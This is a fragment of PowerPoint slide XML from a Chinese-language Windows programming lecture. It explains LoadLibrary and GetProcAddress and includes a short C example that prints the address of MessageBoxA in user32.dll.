            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>LPCSTR); </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390799" y="3688333"/>
            <a:ext cx="10077152" cy="2400657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="91440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zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>包含此函数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模块的句柄。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>AfxLoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GetModuleHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>函数可以返回此句柄。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="91440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zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lpProcName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是包含函数名的以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>结尾的字符串，或者指定函数的序数值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="91440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en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FARPROC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字节指针，指向一个函数的内存地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的返回类型就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FARPROC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。如果你要存放这个地址，可以声明以一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FARPROC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>变量来存放。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2037351700"/>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 presetClass="entr" presetSubtype="2" decel="6000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1+#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56D10B41-3824-4948-AFA3-7256B2F988D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4989215" y="837929"/>
            <a:ext cx="2880320" cy="474140"/>
            <a:chOff x="4989215" y="837929"/>
            <a:chExt cx="2880320" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6978420B-79F3-4824-8BD4-CFA1BB7B5C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4989215" y="1312069"/>
              <a:ext cx="2880320"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CBED80BB-7341-4959-B54E-74E2D8E3677B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105936" y="837929"/>
              <a:ext cx="2646878"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获取函数入口地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316807" y="1672109"/>
            <a:ext cx="10077152" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>windows.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> main()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>{ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        HINSTANCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>LibHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        FARPROC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ProcAdd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>LibHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>("user32");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>user32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>("user32 = 0x%x \n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>LibHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ProcAdd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=(FARPROC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>LibHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = 0x%x \n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ProcAdd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>getchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="0"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7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A904A1C0-7ABA-41A3-9EFB-4D822D6C5F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8635161" y="3760341"/>
            <a:ext cx="2723823" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>运行左侧代码，可以得到</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入口地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x 77D507EA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
